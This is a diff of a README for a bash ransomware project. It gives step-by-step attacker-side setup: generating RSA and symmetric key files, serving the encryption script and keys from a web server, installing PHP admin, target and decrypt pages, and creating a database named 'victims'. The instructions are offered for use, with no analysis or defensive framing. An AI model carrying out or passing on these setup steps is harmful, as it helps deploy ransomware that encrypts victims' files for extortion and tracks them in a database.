SubtleScope/bash-ransomware/README.md

  - $ openssl rsa -pubout -in priv.pem -out pub.pem
  - $ cat /dev/urandom | tr -cd 'A-Za-z0-9' | fold -w 4096 | head -n 1 > key.bin
  - $ mkdir -p /var/www/html/downloads
- - > Modify crypto.sh to reflect your web server address or IP
- - $ cp crypto.sh /var/www/html/downloads/
  - $ cp pub.pem /var/www/html/downloads/
  - $ cp key.bin /var/www/html/downloads/
+ - > Modify crypto.sh and replace the IPwith your web server's IP/URL
+ - $ cp crypto.sh /var/www/html/downloads/
+ - > Copy all of the ransomware files to /var/www/html
+ - > You should have all of the php files in the root of your web dir (/var/www/html/)
+ - > You should also have /var/www/html/images/ and /var/www/html/scripts/
+ - $ cd /var/www/html/downloads
  - $ python -m SimplHTTPServer 8080 &
- - $ mv dec_auth.php /var/www/html/
- - $ mv target.php /var/www/html/
- - $ mv query.php /var/www/html/
+ - $ cd ../
- - > Modify decrypt.php, query.php, and target.php with your database information (Plan to create one file that can be referenced in each)
+ - > Modify admin.php, admin_query.php, decrypt.php, query.php, and target.php with your database information
  - > Next, create the database for storing the data
  - $ mysql -u [user] -p
  - $ create database victims;